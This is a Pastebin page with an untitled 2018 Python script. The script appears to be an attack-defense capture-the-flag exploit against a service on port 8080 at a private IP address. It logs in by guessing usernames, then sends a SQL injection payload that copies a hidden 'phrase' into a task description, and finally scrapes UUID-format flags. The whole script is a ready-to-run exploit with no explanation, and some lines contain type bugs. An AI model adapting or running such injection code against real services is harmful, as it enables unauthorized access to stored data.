daily pastebin goal
5%
SHARE
TWEET

Untitled

a guest Oct 21st, 2018 66 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import socket
  2. import re
  3.  
  4. timeout = 5
  5. except_list = []
  6.  
  7. FLAG_FORMAT = "[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
  8.  
  9. def attack(ip, storage):
  10.     limit = 1024
  11.     name = 'k'
  12.     sock = socket.socket()
  13.     sock.connect((ip, 8080))
  14.     sock.recv(limit)
  15.     sock.send(name.encode())
  16.     sock.send('\n'.encode())
  17.     sock.recv(limit)
  18.     sock.send(name.encode())
  19.     sock.send('\n'.encode())
  20.     str = sock.recv(limit).decode()
  21.     if str.find('Incorrect') != -1:
  22.         while str.find('Incorrect') != -1:
  23.             name = name + 'k'
  24.             sock.close()
  25.             sock = socket.socket()
  26.             sock.connect((ip, 8080))
  27.             sock.recv(limit.encode())
  28.             sock.send(name)
  29.             sock.send('\n'.encode())
  30.             sock.recv(limit.encode())
  31.             sock.send(name)
  32.             sock.send('\n'.encode())
  33.             str = sock.recv(limit).decode()
  34.     print('correct')
  35.     if str.find('role?') != -1:
  36.         sock.send('r'.encode())
  37.         sock.send('\n'.encode())
  38.     sock.recv(limit)
  39.     print('get')
  40.     sock.send('1'.encode())
  41.     sock.send('\n'.encode())
  42.     str = sock.recv(limit).decode()
  43.     last_task = str.split(' ')[-1]
  44.     sock.recv(limit)
  45.     sock.close()
  46.     sock = socket.socket()
  47.     sock.connect((ip, 8080))
  48.     sock.recv(limit)
  49.     str = "'; UPDATE tasks SET(description) = (SELECT phrase FROM tasks WHERE id = " + last_task + ") WHERE id = " + last_task + "; -- "
  50.     sock.send(str.encode())
  51.     sock.send('\n'.encode())
  52.     sock.recv(limit)
  53.     sock.send(name.encode())
  54.     sock.send('\n'.encode())
  55.     sock.recv(limit)
  56.     sock.close()
  57.     sock = socket.socket()
  58.     sock.connect((ip, 8080))
  59.     sock.recv(limit)
  60.     sock.send(name.encode())
  61.     sock.send('\n'.encode())
  62.     sock.recv(limit)
  63.     sock.send(name.encode())
  64.     sock.send('\n'.encode())
  65.     sock.recv(limit)
  66.     sock.send('1'.encode())
  67.     sock.send('\n'.encode())
  68.     sock.recv(limit)
  69.     sock.send(last_task.encode())
  70.     sock.send('\n'.encode())
  71.     return (re.findall(FLAG_FORMAT, sock.recv(limit).decode()), storage)
  72.  
  73. print(attack('10.218.15.2', 'null')[0])
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top